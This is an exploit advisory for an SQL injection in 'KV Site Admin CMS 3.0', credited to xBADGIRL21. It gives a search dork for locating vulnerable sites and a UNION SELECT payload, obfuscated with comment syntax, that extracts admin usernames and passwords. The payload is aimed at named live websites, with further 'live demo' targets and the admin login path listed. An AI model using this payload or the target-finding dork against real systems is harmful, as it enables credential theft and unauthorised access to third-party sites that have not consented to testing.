Exploit Admin CMS 3.0 SQL Injection Vulnerability

#####################

# Exploit Title : KV Site Admin CMS 3.0 SQL injection Vulnerability

# Exploit Author : xBADGIRL21

# Dork : e.World Technology Ltd. All rights reserved    "Admin Area - Version 3.0"

# Version: 3.0

# MyBlog: http://xbadgirl21.blogspot.com

# Tested on: [ BackBox]

# skype:xbadgirl21

# Video Proof : https://youtu.be/43TuHcB_Kec

# Date: 26/08/2016

#####################

# [+] DESCRIPTION :

#####################

# [+] an SQL injection been Detected in KV Site Admin CMS 3.0 after you add ['] to the

# [+] Vuln Target Parameter you will get error like :

# [+] You have an error in your SQL syntax; check the manual that corresponds to your

# [+] MySQL server version for the right syntax to use near '\'' at line 1

#####################

# [+] Poc :

#####################

# [page_code_no] Get Parameter Vulnerable To SQLi

#---------------------

# http://www.site.com/index-h.php?page_code_no=[SQLi]

-----------------------

# http://www.kvrihandnagar.org/index-h.php?page_code_no=19'

# http://www.kvrihandnagar.org/index-h.php?page_code_no=-19 /*!12345union*/ select 1,2,/*!12345group_coNcat(username,0x3a,password)*/,4 from 01_admin_detail--

######################

# [+] Live Demo :

######################

+ http://www.kvmughalsarai.org/index-h.php?page_code_no=40'

+ http://www.kvsrovns.org/index-h.php?page_code_no=1'

######################

# Admin Panel : http://www.site.com/kv_admin/login.php

######################

# Discovered by : xBADGIRL21

# Greetz : All Mauritanien Hackers - NoWhere

#######################

Video Proof




Original Source here